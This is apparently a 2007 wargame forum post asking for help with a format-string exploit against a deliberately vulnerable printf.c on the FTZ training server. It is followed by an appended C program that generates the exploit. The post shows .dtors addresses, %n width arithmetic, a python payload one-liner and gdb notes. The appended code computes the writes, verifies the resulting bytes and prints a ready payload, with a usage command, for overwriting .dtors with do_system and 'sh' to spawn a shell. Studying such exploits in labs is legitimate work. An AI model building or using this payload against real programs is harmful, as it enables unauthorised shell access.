http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2595
Back again after a few days.. heh heh
http://x82.inetcop.org/h0me/papers/FC_exploit/FC-remote_do_system.txt
http://x82.inetcop.org/h0me/papers/FC_exploit/FC_local_do_system.txt
http://x82.inetcop.org/h0me/papers/FC_exploit/FC_local_do_system2.txt
I've been reading the documents above and working through them in practice...
The test on telnet ftz.hackerschool.org isn't working, so I'm asking for help....
------------------------------------------
[level20@ftz in]$ cat printf.c
#include <stdio.h>
#include <string.h>   /* strncpy */
int main(int argc,char *argv[])
{
char buf[256];
if (argc < 2) return 1;
strncpy(buf,argv[1],256-1);
printf(buf);   /* user input used directly as the format string: the bug under test */
return 0;
}
[level20@ftz in]$ gcc -o printf printf.c
[level20@ftz in]$ objdump -s -j .dtors printf
printf: file format elf32-i386
Contents of section .dtors:
8049530 ffffffff 00000000 ........
[level20@ftz in]$
"\x34\x95\x04\x08\x36\x95\x04\x08"
"\x38\x95\x04\x08\x3a\x95\x04\x08"
Dump of assembler code for function do_system:
0x400644b0 <do_system+0>: push %ebp
0x400644b1 <do_system+1>: mov %esp,%ebp
0x44b0 = 17584 / 17584 - 16 = 17568
0x14006 = 81926 / 81926 - 17584 = 64342
0x6873 -> 0x16873 = 92275 / 92275 - 81926 = 10349
0x0000 -> 0x20000 = 131072 / 131072 - 92275 = 38797
%17568x%4$n
%64342x%5$n
%10349x%6$n
%38797x%7$n
[level20@ftz in]$ ./printf `python -c 'print "\x34\x95\x04\x08\x36\x95\x04\x08"+"\x38\x95\x04\x08\x3a\x95\x04\x08"+"%17568x%4$n%64342x%5$n%10349x%6$n%38797x%7$n"'`
...... ...... sh: -c: option requires an argument
Segmentation fault
[level20@ftz in]$
-----------------------------------------
In gdb,
when I do x/x $ebp+8... the value there is 0x00000000...
It should be 0x08049538... why is that?
------------------------------------------
[level20@ftz in]$ cat test.c
#include <stdlib.h>   /* system */
int main()
{
system("sh");
return 0;
}
When I test with the example above...
after running up to br *do_system+8,
the value at x/x $ebp+8 correctly points to the "sh" string...
Phew... I really wanted to solve this on my own...
but I can't find the answer... hmm..
Any advice would be appreciated... *bows*. ^^;
Hit : 3697 Date : 2007/12/05 11:31
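Added example (this is my own code, not code from the post above or from x82's FC papers): a small C generator that reproduces the arithmetic in the post, i.e. the four overlapping 4-byte %n writes that leave do_system's address in .dtors+4 and "sh\0\0" directly behind it, and then replays those stores into a shadow buffer so the resulting bytes can be checked before the payload is fed to the target. The constants (.dtors+4 = 0x08049534, do_system = 0x400644b0, a 16-character prefix from the four addresses, direct parameters %4$ through %7$) are taken from the post; the function names, the 12-byte shadow and the program name "fmtgen" in the usage note are my own. The generator only verifies the memory image the writes produce; it says nothing about what the destructor loop on a particular system actually passes to do_system at ebp+8.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Constants copied from the post: .dtors is at 0x8049530, so .dtors+4 is
 * 0x08049534; do_system in the target libc is 0x400644b0; the four
 * addresses printed ahead of the first %x account for 16 characters. */
#define DTORS_PLUS_4 0x08049534u
#define DO_SYSTEM    0x400644b0u
#define PREFIX_LEN   16u
#define FIRST_PARAM  4u   /* %4$n .. %7$n, the positions found in the post */

/* The four 16-bit words to land, one per %n, at .dtors+4, +6, +8, +10:
 * low and high halves of do_system, then "sh" (0x6873) and a NUL pair. */
static const uint16_t WORDS[4] = { 0x44b0, 0x4006, 0x6873, 0x0000 };

/* For each write, choose a %<width>x padding so the running character
 * count reaches a value whose low 16 bits equal the wanted word. When the
 * word is not above the current low half, borrow 0x10000 (the carry lands
 * in the high bytes, which the next overlapping write clobbers anyway).
 * Assumes each padded %x prints exactly `width` characters, which holds as
 * long as width exceeds the hex length of the argument being printed. */
void compute_widths(const uint16_t words[4], unsigned prefix, unsigned widths[4])
{
    unsigned count = prefix;
    for (int i = 0; i < 4; i++) {
        unsigned target = (count & 0xffff0000u) | words[i];
        while (target <= count)          /* must print at least one more char */
            target += 0x10000u;
        widths[i] = target - count;
        count = target;
    }
}

/* Replay the four %n stores into a 12-byte shadow of .dtors+4..+15. Each
 * %n stores the whole 32-bit count little-endian, and consecutive targets
 * are 2 bytes apart, so every store overwrites the high half of the one
 * before it. This lets you check the final bytes before touching the target. */
void simulate_writes(const unsigned widths[4], unsigned prefix, unsigned char shadow[12])
{
    unsigned count = prefix;
    memset(shadow, 0, 12);
    for (int i = 0; i < 4; i++) {
        count += widths[i];
        for (int b = 0; b < 4; b++)
            shadow[2 * i + b] = (unsigned char)((count >> (8 * b)) & 0xff);
    }
}

/* Assemble argv[1]: four little-endian target addresses (2-byte steps), then
 * the width/%n pairs with direct parameter indices. Returns the payload
 * length, or -1 if an address contains a NUL byte (argv would truncate it)
 * or the buffer is too small. */
int build_payload(uint32_t first_addr, unsigned first_param, const unsigned widths[4],
                  char *out, size_t outlen)
{
    size_t pos = 0;
    if (outlen < 16) return -1;
    for (int i = 0; i < 4; i++) {
        uint32_t a = first_addr + 2u * (uint32_t)i;
        for (int b = 0; b < 4; b++) {
            unsigned char byte = (unsigned char)((a >> (8 * b)) & 0xff);
            if (byte == 0) return -1;
            out[pos++] = (char)byte;
        }
    }
    for (int i = 0; i < 4; i++) {
        int n = snprintf(out + pos, outlen - pos, "%%%ux%%%u$n", widths[i], first_param + i);
        if (n < 0 || (size_t)n >= outlen - pos) return -1;
        pos += (size_t)n;
    }
    return (int)pos;
}

int main(void)
{
    unsigned widths[4];
    unsigned char shadow[12];
    char payload[128];
    int len;

    compute_widths(WORDS, PREFIX_LEN, widths);
    simulate_writes(widths, PREFIX_LEN, shadow);
    len = build_payload(DTORS_PLUS_4, FIRST_PARAM, widths, payload, sizeof payload);
    if (len < 0) { fprintf(stderr, "payload does not fit or contains a NUL byte\n"); return 1; }

    /* Byte image of .dtors+4.. after the four writes goes to stderr; the raw
     * payload goes to stdout so it can be captured into a shell variable. */
    fprintf(stderr, "dtors+4 .. +15:");
    for (int i = 0; i < 12; i++) fprintf(stderr, " %02x", shadow[i]);
    fprintf(stderr, "\n");
    fwrite(payload, 1, (size_t)len, stdout);
    return 0;
}
```

Compiled as fmtgen (a name I chose), it is used as `./printf "$(./fmtgen 2>/dev/null)"`; the stderr dump should read b0 44 06 40 73 68 00 00 before the payload is used, which is do_system followed by "sh" and two NULs. The rule in compute_widths (borrow 0x10000 whenever the wanted word is not above the current low half of the count) is the general form of the four hand-computed lines in the post, and the NUL check in build_payload is the reason the addresses are stepped by 2 bytes rather than written with a single %n that would need a count in the 0x40000000 range.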